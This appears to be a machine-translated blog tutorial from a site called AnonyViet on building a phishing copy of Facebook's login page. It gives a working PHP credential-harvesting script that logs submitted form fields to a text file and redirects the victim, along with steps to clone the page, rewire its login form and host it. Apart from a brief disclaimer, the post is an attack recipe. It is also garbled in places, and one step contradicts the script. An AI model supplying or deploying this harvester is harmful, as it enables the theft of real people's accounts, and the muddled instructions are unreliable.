What is Phishing?
Web Phising is a form of spoofing site to steal accounts
Join the channel Telegram belong to AnonyViet 👉 Link 👈 |
Today Anonyviet would like to guide you you create a phising website yourself (scam) simple as you like.
This article was written by me to help you gain more knowledge about web scam, phising.
From there, it helps you see how people create it, how to identify and prevent phishing sites, not recommended You use it for destructive purposes
Thank !
Prepare
- Hosting (You can register at free web hosting like hostinger.vn)
Let’s get to work!
Step 1
Create files “nick.php” on hosting, put the following code in and save
<?php header("Location: http:// "); //nhập link các bạn muốn chuyển đến $handle = fopen("log.txt", "a");//nơi lưu tài khoản foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Step 2
Open the website you want to fake (here I will give an example with Facebook page)
– You enter https://www.facebook.com right click select “save as…” or press the key combination “Ctrl + S” to save the code of the page to be faked.
A dialog box appears, save with the file name “index” and choose “Save Entire Page”
– After the download is complete, open the file “index.html” just downloaded
- – Press the key combination “Ctrl + F” type in the search box “action=” press Enter
Edit the line “https://www.facebook.com/login.php?login_attempt=1&lwv=110” wall “nick.php“ - Fix method=”post .”“ wall method=”get”
After editing the song can be like the picture
After you have fixed it as shown, save the code again
Step 3
- Upload files index.html Upload the hosting you just created above to your host.
- Create files log.txt
Note
3 File index.html, nick.php, log.txt must be in the same directory
So you have successfully created Phising Facebook website once again, I repeat: Do not encourage actions that destroy others.
Anonyviet – Blue